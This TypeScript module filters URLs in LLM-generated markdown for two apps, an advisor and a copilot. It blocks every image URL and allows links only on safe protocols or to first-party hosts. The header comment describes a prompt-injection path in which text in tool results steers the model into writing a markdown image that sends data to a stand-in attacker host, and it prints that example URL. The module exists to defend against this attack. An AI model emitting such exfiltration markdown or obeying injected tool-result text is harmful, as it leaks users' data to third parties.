/**
 * URL policy for rendering LLM markdown (SEC-03).
 *
 * A model can be steered — by buyer-typed text in its tool results — into
 * writing `![](https://attacker.tld/?d=<data>)`. The browser fetches an image
 * with no click, so these transforms never let an image URL through: pair them
 * with an `img` component override that renders nothing, so a dropped `src`
 * cannot fall back to anything.
 *
 * Shapes match react-markdown's `urlTransform(url, key, node)`; this module
 * does not import react-markdown so both apps share it.
 *
 *   - `advisorUrlTransform` (consumer advisor): no images; links keep the
 *     default safe protocols (relative, http, https, mailto).
 *   - `copilotUrlTransform` (Pro copilot): no images; links only to relative
 *     URLs or FIRST_PARTY_LINK_HOSTS (the same list the backend mdsafe pass
 *     keeps — pinned by frontend/shared/testdata/markdown_link_hosts.json).
 */

/** Hosts (exact or any subdomain) the Pro copilot may link to. */
export const FIRST_PARTY_LINK_HOSTS: readonly string[] = [
  "usesill.com",
  "consumerfinance.gov",
  "fanniemae.com",
  "freddiemac.com",
  "ftc.gov",
  "heretohome.org",
  "hud.gov",
  "usda.gov",
  "va.gov",
  "wshfc.org",
];

const SCHEME = /^[a-z][a-z0-9+.-]*:/i;

/** Relative URL: no scheme and not protocol-relative ("//host"). */
function isRelative(url: string): boolean {
  return !SCHEME.test(url) && !url.startsWith("//") && !url.includes("\\");
}

function parse(url: string): URL | null {
  try {
    return new URL(url);
  } catch {
    return null;
  }
}

/** react-markdown's default protocol safety: relative, http(s), mailto. */
export function isSafeLinkHref(url: string): boolean {
  const trimmed = url.trim();
  if (isRelative(trimmed)) return true;
  const u = parse(trimmed);
  return u !== null && ["http:", "https:", "mailto:"].includes(u.protocol);
}

/**
 * First-party link policy: relative URLs, http(s) on FIRST_PARTY_LINK_HOSTS
 * with no credentials, and plain `mailto:` with no query (GFM autolinks a
 * bare email address; a `?body=` would let a link carry data out).
 */
export function isFirstPartyLinkHref(url: string): boolean {
  const trimmed = url.trim();
  if (isRelative(trimmed)) return true;
  const u = parse(trimmed);
  if (u === null) return false;
  if (u.protocol === "mailto:") return !trimmed.includes("?");
  if (u.protocol !== "http:" && u.protocol !== "https:") return false;
  if (u.username || u.password) return false;
  const host = u.hostname.toLowerCase();
  return FIRST_PARTY_LINK_HOSTS.some((h) => host === h || host.endsWith(`.${h}`));
}

/** Consumer advisor: drop every image URL; keep safe-protocol links. */
export function advisorUrlTransform(url: string, key: string): string | null {
  if (key !== "href") return null;
  return isSafeLinkHref(url) ? url : null;
}

/** Pro copilot: drop every image URL; keep only first-party links. */
export function copilotUrlTransform(url: string, key: string): string | null {
  if (key !== "href") return null;
  return isFirstPartyLinkHref(url) ? url : null;
}
